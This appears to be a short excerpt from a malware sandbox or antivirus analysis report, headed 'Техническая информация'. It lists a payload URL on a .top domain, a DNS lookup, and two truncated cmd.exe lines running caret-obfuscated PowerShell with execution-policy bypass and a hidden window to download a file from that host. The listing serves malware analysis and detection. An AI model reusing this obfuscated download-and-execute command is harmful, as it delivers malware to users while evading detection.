Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^ER^shEll^.E^X^e ^-E^Xe^C^uti^oNPoliCY ^B^yp^as^s -NOPROFi^Le -wi^nDow^st^Yl^E^ Hi^DDeN^ (^nE^W-oBJEcT^ sy^StEm.n^Et.^we^bc^L^iEnT).Dow^NLo^A^DfILe^('http://roggistazli...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "pOW^ER^shEll^.E^X^e ^-E^Xe^C^uti^oNPoliCY ^B^yp^as^s -NOPROFi^Le -wi^nDow^st^Yl^E^ Hi^DDeN^ (^nE^W-oBJEcT^ sy^StEm.n^Et.^we^bc^L^iEnT).Dow^NLo^A^DfILe^('http://roggistazli... (со скрытым окном)